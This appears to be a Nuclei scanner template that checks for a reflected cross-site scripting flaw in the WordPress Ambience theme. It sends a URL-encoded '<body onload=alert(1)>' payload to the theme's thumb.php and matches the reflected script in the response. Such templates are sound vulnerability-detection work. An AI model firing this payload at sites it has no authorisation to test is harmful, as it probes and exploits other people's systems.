nuclei-templates/vulnerabilities/wordpress/wp-ambience-xss.yaml

34 lines
826 B
YAML

id: wp-ambience-xss
info:
name: WordPress Theme Ambience <= 1.0 - Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: |
The ambience WordPress theme was affected by a Cross-Site Scripting (XSS) security vulnerability.
reference:
- https://www.exploit-db.com/exploits/38568
- https://wpscan.com/vulnerability/c465e5c1-fe43-40e9-894a-97b8ac462381
tags: wordpress,xss,wp-plugin,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<body onload=alert(1)>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200